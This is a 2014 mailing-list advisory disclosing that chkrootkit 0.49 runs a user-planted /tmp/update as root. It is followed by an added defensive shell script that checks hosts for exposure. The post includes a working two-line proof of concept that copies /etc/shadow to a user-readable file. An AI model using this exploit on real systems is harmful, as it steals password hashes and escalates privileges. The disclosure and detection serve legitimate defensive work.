[Slackbuilds-users] chkrootkit vulnerability
mancha
mancha1 at hush.com
Thu Jun 5 06:27:35 UTC 2014
Hi.
As ironic as it sounds, chkrootkit 0.49 can be turned into a rootkit.
On systems where /tmp is not mounted noexec, a regular user can create a
file /tmp/update which chkrootkit will execute with root privileges each
time it's run.
Here's a simple PoC...as normal user:
$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update
As root:
# chkrootkit
Now the user has access to the shadow password file (/tmp/stolen).
Solution: Update to chkrootkit 0.50
--mancha
-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF ADD1 2516 8EB2 4F0B 22AC]
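Added example, not part of mancha's post or of chkrootkit: a shell check for the two conditions the post names (a chkrootkit release older than 0.50 and a /tmp that is not mounted noexec), plus a look for an executable /tmp/update. The function names, the sample mount table and the assumed "chkrootkit version 0.NN" string format are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the post). Sample inputs below are constructed.

# Reads a mount table in /proc/mounts format on stdin; succeeds when the
# filesystem holding /tmp (or / if /tmp is not a separate mount) is noexec.
tmp_is_noexec() {
    awk '$2 == "/"    { root = $4 }
         $2 == "/tmp" { tmp = $4 }
         END { o = (tmp != "") ? tmp : root
               exit ((("," o ",") ~ /,noexec,/) ? 0 : 1) }'
}

# Succeeds when the version is older than 0.50, the release the post names as
# the fix. Assumes a string ending in 0.NN, e.g. "chkrootkit version 0.49";
# returns 2 when it cannot be parsed.
version_needs_update() {
    v=${1##* }
    case $v in *.*) ;; *) return 2 ;; esac
    major=${v%%.*}
    minor=${v#*.}
    case $major in ''|*[!0-9]*) return 2 ;; esac
    case $minor in ''|*[!0-9]*) return 2 ;; esac
    [ "$major" -eq 0 ] && [ "$minor" -lt 50 ]
}

# Succeeds when DIR/update is a regular file with the owner-execute bit set.
tmp_update_present() {
    [ -n "$(find "$1/update" -type f -perm -100 2>/dev/null)" ]
}

# exposed VERSION_STRING < mount-table: succeeds when both conditions hold.
exposed() {
    version_needs_update "$1" || return 1
    if tmp_is_noexec; then return 1; fi
    return 0
}

# Constructed sample: /tmp is a tmpfs mounted without noexec.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0'

if printf '%s\n' "$SAMPLE_MOUNTS" | exposed "chkrootkit version 0.49"; then
    echo "sample host: exposed, update chkrootkit to 0.50 and check /tmp/update"
fi
# Live host (run as the admin): exposed "$(chkrootkit -V 2>&1)" < /proc/mounts
```

An unparsable version string makes exposed report "not exposed", so check the return code of version_needs_update separately when the installed version is unknown.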